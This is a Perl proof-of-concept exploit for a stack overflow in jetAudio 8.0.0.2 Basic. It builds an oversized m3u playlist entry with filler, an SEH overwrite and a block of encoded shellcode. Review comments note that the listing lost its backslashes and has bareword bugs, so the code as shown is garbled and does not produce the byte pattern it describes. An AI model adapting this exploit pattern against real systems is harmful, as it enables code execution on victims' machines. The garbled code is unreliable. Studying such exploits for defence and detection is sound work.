
# Title : jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Published : 2010-01-21
# Author : cr4wl3r


#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r <cr4wl3r[!]linuxmail.org>
# Tested: Windows xp(sp2)
#########################################

# Purpose: writes a single playlist file ($file) whose only entry is an
# oversized "http://" line -- the proof-of-concept input for the stack
# overflow named in the title.  The script never runs the target itself.
#
# Code-quality notes (review):
#   - No `use strict; use warnings;`.  With strict enabled the barewords
#     on the $footer and final print lines would be compile errors.
#   - As reproduced on this page the string literals below carry no
#     backslash, so e.g. "xebx06x90x90" is a 12-character ASCII string,
#     not four bytes; the listing does not produce the byte pattern the
#     variable names describe.  Left unchanged.
#
# Defensive note: the output is an .m3u whose one entry is roughly 2 KB
# long (see the 2000-byte target in $footer).  Playlist entries of that
# length are a usable heuristic for this class of parser-overflow input.
my $file="b00m.m3u";

my $header = "http://";
my $junk = "A" x 1017;          # 1017 bytes of filler before the SEH fields
my $nseh = "xebx06x90x90";  
my $seh = pack('V',0x01221045); # 32-bit little-endian value (pack 'V')

my $shellcode = 
"x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";


# NOTE(review): `junk.nseh.seh.shellcode` are barewords (no `$` sigils),
# so length() is taken of the literal string "junknsehsehshellcode", not of
# the variables; the intended total of 2000 bytes is therefore not reached.
my $footer="E" x (2000-length(junk.nseh.seh.shellcode));

my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;

print " Writing payload to filen";   # "\n" lost on this page; prints literal "filen"

# 2-arg open with a bareword handle and no error check.  The mode is taken
# from the string, so this form is only safe because $file is a fixed
# literal; the 3-arg form `open my $fh, '>', $file or die $!` is preferred.
open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
print " Exploit file " . b00m . " createdn";   # `b00m` is a bareword, not $file
print " b00m " . length($payload) . " bytesn";